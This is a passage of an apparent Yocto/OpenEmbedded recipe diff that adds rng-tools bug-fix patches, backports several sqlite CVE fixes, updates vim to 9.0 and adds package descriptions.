 SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8"
 SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c"
 UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases"
diff --git a/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
new file mode 100644
index 0000000000..3b44095cf5
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
@@ -0,0 +1,26 @@
+From 6ce86cb5cf06541cd5aad70fe8494b07b22c247e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:10:32 +0100
+Subject: [PATCH] rngd_jitter: fix O_NONBLOCK setting for entropy pipe
+
+A pointer was passed to fcntl instead of the flags variable, setting
+random flags.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 32bac53..25b3543 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -465,7 +465,7 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ 
+ 	flags = fcntl(pipefds[0], F_GETFL, 0);
+ 	flags |= O_NONBLOCK;
+-	fcntl(pipefds[0], F_SETFL, &flags);
++	fcntl(pipefds[0], F_SETFL, flags);
+ 
+ 	if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
diff --git a/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
new file mode 100644
index 0000000000..34f8227543
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
@@ -0,0 +1,38 @@
+From 330c2ba14510c8103b30d5021adb18f1534031a1 Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:18:09 +0100
+Subject: [PATCH] rngd_jitter: initialize AES key before setting the entropy
+ pipe to O_NONBLOCK
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 9 +++++----
+ 1 file changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 25b3543..48f344c 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -463,10 +463,6 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ 		pthread_mutex_unlock(&tdata[i].statemtx);
+ 	}
+ 
+-	flags = fcntl(pipefds[0], F_GETFL, 0);
+-	flags |= O_NONBLOCK;
+-	fcntl(pipefds[0], F_SETFL, flags);
+-
+ 	if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
+ 		/*
+@@ -487,6 +483,11 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ 			ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 1;
+ 		}
+ 		xread_jitter(aes_buf, tdata[0].buf_sz, ent_src);
++
++		flags = fcntl(pipefds[0], F_GETFL, 0);
++		flags |= O_NONBLOCK;
++		fcntl(pipefds[0], F_SETFL, flags);
++
+ #else
+ 		message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ 		ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
diff --git a/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
new file mode 100644
index 0000000000..b3bc8028ea
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
@@ -0,0 +1,38 @@
+From 36bc92ef2789b13183c8895d83665f48b13c2b9e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:22:39 +0100
+Subject: [PATCH] rngd_jitter: always read from entropy pipe before setting
+ O_NONBLOCK
+
+Even with AES disabled, we want to make sure that jent_read_entropy() has
+already generated some entropy before we consider the the source
+initialized. Otherwise "Entropy Generation is slow" log spam will be
+emitteded until this has happened, which can take several seconds.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 48f344c..b736cdd 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -492,6 +492,17 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ 		message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ 		ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
+ #endif
++	} else {
++		/*
++		 * Make sure that an entropy gathering thread has generated
++		 * at least some entropy before setting O_NONBLOCK and finishing
++		 * the entropy source initialization.
++		 *
++		 * This avoids "Entropy Generation is slow" log spamming that
++		 * would otherwise happen until jent_read_entropy() has run
++		 * for the first time.
++		 */
++		xread_jitter(&i, 1, ent_src);
+ 	}
+ 	message_entsrc(ent_src,LOG_DAEMON|LOG_INFO, "Enabling JITTER rng support\n");
+ 	return 0;
diff --git a/meta/recipes-support/rng-tools/rng-tools/rngd.service b/meta/recipes-support/rng-tools/rng-tools/rngd.service
index aaaaa29074..f296a99e1f 100644
--- a/meta/recipes-support/rng-tools/rng-tools/rngd.service
+++ b/meta/recipes-support/rng-tools/rng-tools/rngd.service
@@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon
 DefaultDependencies=no
 After=systemd-udev-settle.service
 Before=sysinit.target shutdown.target
+Wants=systemd-udev-settle.service
 Conflicts=shutdown.target
 
 [Service]
diff --git a/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
index 913342c315..58b58fbb3c 100644
--- a/meta/recipes-support/rng-tools/rng-tools_6.9.bb
+++ b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
@@ -9,7 +9,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 DEPENDS = "sysfsutils"
 
 SRC_URI = "\
-    git://github.com/nhorman/rng-tools.git \
+    git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \
+    file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \
+    file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \
+    file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \
     file://init \
     file://default \
     file://rngd.service \
diff --git a/meta/recipes-support/serf/serf_1.3.9.bb b/meta/recipes-support/serf/serf_1.3.9.bb
index 6a27f12102..3276d40df6 100644
--- a/meta/recipes-support/serf/serf_1.3.9.bb
+++ b/meta/recipes-support/serf/serf_1.3.9.bb
@@ -1,4 +1,9 @@
 SUMMARY = "High-Performance Asynchronous HTTP Client Library"
+DESCRIPTION = "The Apache Serf library is a C-based HTTP client library built upon the Apache \
+Portable Runtime (APR) library. It multiplexes connections, running the \
+read/write communication asynchronously. Memory copies and transformations are \
+kept to a minimum to provide high performance operation."
+HOMEPAGE = "http://serf.apache.org/"
 SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
            file://norpath.patch \
            file://env.patch \
@@ -30,4 +35,9 @@ EXTRA_OESCONS = " \
                   OPENSSL="${STAGING_EXECPREFIXDIR}" \
                   "
 
+# scons creates non-reproducible archives
+do_install_append() {
+	rm ${D}/${libdir}/*.a
+}
+
 BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
index 7a060b09ad..05c7d32965 100644
--- a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
+++ b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Shared MIME type database and specification"
+DESCRIPTION = "The shared-mime-info package contains the core database of common types and the update-mime-database command used to extend it. It requires glib2 to be installed for building the update command. Additionally, it uses intltool for translations, though this is only a dependency for the maintainers."
 HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info"
 SECTION = "base"
 
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
 DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native"
 
-SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https"
+SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master"
 SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a"
 PV = "1.15"
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35525.patch b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
new file mode 100644
index 0000000000..27d81d42d9
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
@@ -0,0 +1,21 @@
+From: drh <drh@noemail.net>
+Date: Thu, 20 Feb 2020 14:08:51 +0000
+Subject: [PATCH] Early-out on the INTERSECT query processing following an
+ error.
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35525
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -130767,6 +130767,7 @@ static int multiSelect(
+         /* Generate code to take the intersection of the two temporary
+         ** tables.
+         */
++        if( rc ) break;
+         assert( p->pEList );
+         iBreak = sqlite3VdbeMakeLabel(pParse);
+         iCont = sqlite3VdbeMakeLabel(pParse);
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35527.patch b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
new file mode 100644
index 0000000000..d1dae389b0
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
@@ -0,0 +1,22 @@
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Fix a problem with ALTER TABLE for views that have a nested
+ FROM clause. Ticket [f50af3e8a565776b].
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35527
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -133110,7 +133110,7 @@ static int selectExpander(Walker *pWalke
+             pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
+             sqlite3TokenInit(&sColname, zColname);
+             sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
+-            if( pNew && (p->selFlags & SF_NestedFrom)!=0 ){
++            if( pNew && (p->selFlags & SF_NestedFrom)!=0 && !IN_RENAME_OBJECT ){
+               struct ExprList_item *pX = &pNew->a[pNew->nExpr-1];
+               sqlite3DbFree(db, pX->zEName);
+               if( pSub ){
diff --git a/meta/recipes-support/sqlite/files/CVE-2021-20223.patch b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
new file mode 100644
index 0000000000..e9d2e04d30
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
@@ -0,0 +1,23 @@
+From d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b Mon Sep 17 00:00:00 2001
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Prevent fts5 tokenizer unicode61 from considering '\0' to be
+ a token characters, even if other characters of class "Cc" are.
+
+FossilOrigin-Name: b7b7bde9b7a03665e3691c6d51118965f216d2dfb1617f138b9f9e60e418ed2f
+
+CVE: CVE-2021-20223
+Upstream-Status: Backport [https://github.com/sqlite/sqlite/commit/d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b.patch]
+Comment: Removed manifest, manifest.uuid and fts5tok1.test as these files are not present in the amalgamated source code
+Signed-Off-by: Sana.Kazi@kpit.com
+---
+--- a/sqlite3.c        2022-09-09 13:54:30.010768197 +0530
++++ b/sqlite3.c        2022-09-09 13:56:25.458769142 +0530
+@@ -227114,6 +227114,7 @@
+     }
+     iTbl++;
+   }
++  aAscii[0] = 0;                  /* 0x00 is never a token character */
+ }
+
+ /*
diff --git a/meta/recipes-support/sqlite/files/CVE-2022-35737.patch b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
new file mode 100644
index 0000000000..341e002913
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
@@ -0,0 +1,29 @@
+From 2bbf4c999dbb4b520561a57e0bafc19a15562093 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 2 Sep 2022 11:22:29 +0530
+Subject: [PATCH] CVE-2022-35737
+
+Upstream-Status: Backport [https://www.sqlite.org/src/info/aab790a16e1bdff7]
+CVE: CVE-2022-35737
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ sqlite3.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index f664217..33dfb78 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -28758,7 +28758,8 @@ SQLITE_API void sqlite3_str_vappendf(
+       case etSQLESCAPE:           /* %q: Escape ' characters */
+       case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
+       case etSQLESCAPE3: {        /* %w: Escape " characters */
+-        int i, j, k, n, isnull;
++        i64  i, j, k, n;
++        int isnull;
+         int needQuote;
+         char ch;
+         char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/sqlite/files/CVE-2023-7104.patch b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
new file mode 100644
index 0000000000..01ff29ff5e
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
@@ -0,0 +1,46 @@
+From eab426c5fba69d2c77023939f72b4ad446834e3c Mon Sep 17 00:00:00 2001
+From: dan <Dan Kennedy>
+Date: Thu, 7 Sep 2023 13:53:09 +0000
+Subject: [PATCH] Fix a buffer overread in the sessions extension that could occur when processing a corrupt changeset.
+
+Upstream-Status: Backport [https://sqlite.org/src/info/0e4e7a05c4204b47]
+CVE: CVE-2023-7104
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ sqlite3.c | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index 972ef18..c645ac8 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -203301,15 +203301,19 @@ static int sessionReadRecord(
+         }
+       }
+       if( eType==SQLITE_INTEGER || eType==SQLITE_FLOAT ){
+-        sqlite3_int64 v = sessionGetI64(aVal);
+-        if( eType==SQLITE_INTEGER ){
+-          sqlite3VdbeMemSetInt64(apOut[i], v);
++	if( (pIn->nData-pIn->iNext)<8 ){
++	  rc = SQLITE_CORRUPT_BKPT;
+         }else{
+-          double d;
+-          memcpy(&d, &v, 8);
+-          sqlite3VdbeMemSetDouble(apOut[i], d);
++	  sqlite3_int64 v = sessionGetI64(aVal);
++	  if( eType==SQLITE_INTEGER ){
++	    sqlite3VdbeMemSetInt64(apOut[i], v);
++	  }else{
++	    double d;
++	    memcpy(&d, &v, 8);
++	    sqlite3VdbeMemSetDouble(apOut[i], d);
++	  }
++	  pIn->iNext += 8;
+         }
+-        pIn->iNext += 8;
+       }
+     }
+   }
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/sqlite/sqlite3.inc b/meta/recipes-support/sqlite/sqlite3.inc
index 07614bdb3e..1adc0eba66 100644
--- a/meta/recipes-support/sqlite/sqlite3.inc
+++ b/meta/recipes-support/sqlite/sqlite3.inc
@@ -1,4 +1,5 @@
 SUMMARY = "Embeddable SQL database engine"
+DESCRIPTION = "A library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day"
 HOMEPAGE = "http://www.sqlite.org"
 SECTION = "libs"
 
diff --git a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
index c289affd60..0e7bcfa5a7 100644
--- a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
+++ b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
@@ -13,9 +13,16 @@ SRC_URI = "http://www.sqlite.org/2020/sqlite-autoconf-${SQLITE_PV}.tar.gz \
            file://CVE-2020-13630.patch \
            file://CVE-2020-13631.patch \
            file://CVE-2020-13632.patch \
+           file://CVE-2022-35737.patch \
+           file://CVE-2020-35525.patch \
+           file://CVE-2020-35527.patch \
+           file://CVE-2021-20223.patch \
+           file://CVE-2023-7104.patch \
            "
 SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125"
 SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae"
 
 # -19242 is only an issue in specific development branch commits
 CVE_CHECK_WHITELIST += "CVE-2019-19242"
+# This is believed to be iOS specific (https://groups.google.com/g/sqlite-dev/c/U7OjAbZO6LA)
+CVE_CHECK_WHITELIST += "CVE-2015-3717"
diff --git a/meta/recipes-support/taglib/taglib_1.11.1.bb b/meta/recipes-support/taglib/taglib_1.11.1.bb
index f4e288295d..165bccadc1 100644
--- a/meta/recipes-support/taglib/taglib_1.11.1.bb
+++ b/meta/recipes-support/taglib/taglib_1.11.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Library for reading and editing the meta-data of popular audio formats"
+DESCRIPTION = "Platform-independent library (tested on Windows/Linux) for reading and writing metadata in media files, including video, audio, and photo formats. This is a convenient one-stop-shop to present or tag all your media collection, regardless of which format/container these might use. You can read/write the standard or more common tags/properties of a media, or you can also create and retrieve your own custom tags."
 SECTION = "libs/multimedia"
 HOMEPAGE = "http://taglib.github.io/"
 LICENSE = "LGPLv2.1 | MPL-1.1"
diff --git a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
index 63a7b78f12..2fc11dbdc2 100644
--- a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
+++ b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
@@ -16,11 +16,11 @@ Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
  src/Makefile | 14 ++++----------
  1 file changed, 4 insertions(+), 10 deletions(-)
 
-diff --git a/src/Makefile b/src/Makefile
-index f2fafa4dc..7148d4bd9 100644
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2845,16 +2845,10 @@ auto/pathdef.c: Makefile auto/config.mk
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -3101,16 +3101,10 @@ auto/pathdef.c: Makefile auto/config.mk
  	-@echo '#include "vim.h"' >> $@
  	-@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@
  	-@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@
@@ -41,6 +41,3 @@ index f2fafa4dc..7148d4bd9 100644
  	-@sh $(srcdir)/pathdef.sh
  
  GUI_GTK_RES_INPUTS = \
--- 
-2.17.1
-
diff --git a/meta/recipes-support/vim/files/disable_acl_header_check.patch b/meta/recipes-support/vim/files/disable_acl_header_check.patch
index 33089162b4..533138245d 100644
--- a/meta/recipes-support/vim/files/disable_acl_header_check.patch
+++ b/meta/recipes-support/vim/files/disable_acl_header_check.patch
@@ -13,11 +13,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
  src/configure.ac | 3 ++-
  1 file changed, 2 insertions(+), 1 deletion(-)
 
-diff --git a/src/configure.ac b/src/configure.ac
-index 2d409b3ca06a..dbcaf6140263 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3257,7 +3257,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h string.h \
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3292,7 +3292,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h strin
  	sys/systeminfo.h locale.h sys/stream.h termios.h \
  	libc.h sys/statfs.h poll.h sys/poll.h pwd.h \
  	utime.h sys/param.h sys/ptms.h libintl.h libgen.h \
@@ -26,7 +26,7 @@ index 2d409b3ca06a..dbcaf6140263 100644
  	sys/access.h sys/sysinfo.h wchar.h wctype.h)
  
  dnl sys/ptem.h depends on sys/stream.h on Solaris
-@@ -3886,6 +3886,7 @@ AC_ARG_ENABLE(acl,
+@@ -3974,6 +3974,7 @@ AC_ARG_ENABLE(acl,
  	, [enable_acl="yes"])
  if test "$enable_acl" = "yes"; then
    AC_MSG_RESULT(no)
@@ -34,6 +34,3 @@ index 2d409b3ca06a..dbcaf6140263 100644
    AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"],
  	AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl"
  		  AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),)
--- 
-2.7.4
-
diff --git a/meta/recipes-support/vim/files/no-path-adjust.patch b/meta/recipes-support/vim/files/no-path-adjust.patch
index 05c2d803f6..9d6da80913 100644
--- a/meta/recipes-support/vim/files/no-path-adjust.patch
+++ b/meta/recipes-support/vim/files/no-path-adjust.patch
@@ -7,9 +7,11 @@ Upstream-Status: Pending
 
 Signed-off-by: Joe Slater <joe.slater@windriver.com>
 
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2507,11 +2507,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -2565,11 +2565,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
  		 rm -rf $$cvs; \
  	      fi
  	-chmod $(FILEMOD) $(DEST_TOOLS)/*
diff --git a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
index 37914d4cd9..5284ba45b6 100644
--- a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
+++ b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
@@ -14,11 +14,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
  src/configure.ac | 7 +++++++
  1 file changed, 7 insertions(+)
 
-diff --git a/src/configure.ac b/src/configure.ac
-index 0ee86ad..64736f0 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3192,11 +3192,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [int x __attribute__((unused));],
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3264,11 +3264,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [in
  	AC_MSG_RESULT(no))
  
  dnl Checks for header files.
@@ -37,6 +37,3 @@ index 0ee86ad..64736f0 100644
  
  AC_HEADER_DIRENT
  
--- 
-2.7.4
-
diff --git a/meta/recipes-support/vim/vim-tiny_8.2.bb b/meta/recipes-support/vim/vim-tiny_9.0.bb
index e4c26d23f6..e4c26d23f6 100644
--- a/meta/recipes-support/vim/vim-tiny_8.2.bb
+++ b/meta/recipes-support/vim/vim-tiny_9.0.bb
diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc
index 4d2886c19e..6d62bd67af 100644
--- a/meta/recipes-support/vim/vim.inc
+++ b/meta/recipes-support/vim/vim.inc
@@ -1,28 +1,37 @@
 SUMMARY = "Vi IMproved - enhanced vi editor"
+DESCRIPTION = "Vim is a greatly improved version of the good old UNIX editor Vi. Many new features have been added: multi-level undo, syntax highlighting, command line history, on-line help, spell checking, filename completion, block operations, script language, etc. There is also a Graphical User Interface (GUI) available."
 SECTION = "console/utils"
 
+HOMEPAGE = "https://www.vim.org/"
+BUGTRACKER = "https://github.com/vim/vim/issues"
+
 DEPENDS = "ncurses gettext-native"
 # vimdiff doesn't like busybox diff
 RSUGGESTS_${PN} = "diffutils"
+
 LICENSE = "vim"
-LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a"
+LIC_FILES_CHKSUM = "file://LICENSE;md5=d1a651ab770b45d41c0f8cb5a8ca930e"
 
-SRC_URI = "git://github.com/vim/vim.git \
+SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \
            file://disable_acl_header_check.patch \
            file://vim-add-knob-whether-elf.h-are-checked.patch \
            file://0001-src-Makefile-improve-reproducibility.patch \
            file://no-path-adjust.patch \
-"
-SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44"
+           "
+
+PV .= ".2190"
+SRCREV = "6a950da86d7a6eb09d5ebeab17657986420d07ac"
 
 # Do not consider .z in x.y.z, as that is updated with every commit
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0"
+# Ignore that the upstream version .z in x.y.z is always newer
+UPSTREAM_VERSION_UNKNOWN = "1"
 
 S = "${WORKDIR}/git"
 
 VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}"
 
-inherit autotools-brokensep update-alternatives mime-xdg
+inherit autotools-brokensep update-alternatives mime-xdg pkgconfig
 
 CLEANBROKEN = "1"
 
@@ -31,29 +40,24 @@ do_configure () {
     cd src
     rm -f auto/*
     touch auto/config.mk
+    # git timestamps aren't reliable, so touch the shipped .po files so they aren't regenerated
+    touch -c po/cs.cp1250.po po/ja.euc-jp.po po/ja.sjis.po po/ko.po po/pl.UTF-8.po po/pl.cp1250.po po/ru.cp1251.po po/sk.cp1250.po po/uk.cp1251.po po/zh_CN.po po/zh_CN.cp936.po po/zh_TW.po
+    # ru.cp1251.po uses CP1251 rather than cp1251, fix that
+    sed -i -e s/CP1251/cp1251/ po/ru.cp1251.po
     aclocal
     autoconf
     cd ..
     oe_runconf
     touch src/auto/configure
     touch src/auto/config.mk src/auto/config.h
+    # need a native tool, not a target one
+    ${BUILD_CC} src/po/sjiscorr.c -o src/po/sjiscorr
 }
 
-do_compile() {
-    # We do not support fully / correctly the following locales.  Attempting
-    # to use these with msgfmt in order to update the ".desktop" files exposes
-    # this problem and leads to the compile failing.
-    for LOCALE in cs fr ko pl sk zh_CN zh_TW;do
-        echo -n > src/po/${LOCALE}.po
-    done
-    autotools_do_compile
-}
-
-#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny
-PACKAGECONFIG ??= ""
-PACKAGECONFIG += " \
+PACKAGECONFIG ??= "\
     ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \
     ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \
+    nls \
 "
 
 PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3"
@@ -62,14 +66,18 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt,"
 PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,,"
 PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,"
 PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils,"
+PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,,"
 
 EXTRA_OECONF = " \
     --disable-gpm \
     --disable-gtktest \
     --disable-xim \
     --disable-netbeans \
+    --disable-desktop-database-update \
     --with-tlib=ncurses \
+    --with-modified-by='${MAINTAINER}' \
     ac_cv_small_wchar_t=no \
+    ac_cv_path_GLIB_COMPILE_RESOURCES=no \
     vim_cv_getcwd_broken=no \
     vim_cv_memmove_handles_overlap=yes \
     vim_cv_stat_ignores_slash=no \
@@ -80,6 +88,11 @@ EXTRA_OECONF = " \
     STRIP=/bin/true \
 "
 
+# Some host distros don't have it, disable consistently
+# also disable on dunfell target builds
+EXTRA_OECONF_append_class-native = " vim_cv_timer_create=no"
+EXTRA_OECONF_append_class-target = " vim_cv_timer_create=no"
+
 do_install() {
     autotools_do_install
 
diff --git a/meta/recipes-support/vim/vim_8.2.bb b/meta/recipes-support/vim/vim_9.0.bb
index 709b6ddb55..709b6ddb55 100644
--- a/meta/recipes-support/vim/vim_8.2.bb
+++ b/meta/recipes-support/vim/vim_9.0.bb
